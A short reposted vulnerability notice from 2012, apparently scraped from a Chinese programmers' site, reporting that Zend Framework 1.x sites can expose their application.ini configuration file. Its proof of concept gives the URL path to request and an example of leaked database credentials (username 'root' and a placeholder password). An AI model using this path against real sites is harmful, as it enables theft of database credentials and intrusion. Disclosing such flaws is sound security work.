且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事

Zend Framework suffers from a SQL configuration file disclosure vulnerability.

更新时间:2022-09-17 07:43:53

[+] Vulnerability: Zend Framework SQL Configuration-File disclosure
[-]
[+] Author: W4n73d   openforce[at]live[dot]com
[-]
[-]
[+] Vendor: framework.zend.com
[+] Version: 1.x.x
[-]
[-]
[+] PoC: www.whatever.br/application/configs/application.ini
[-]
[+] EX:
//
    params.username = "root"
    params.password = "myleetpass"
//
[-]
[+] Date: 25. Ago. 2012. Brazil.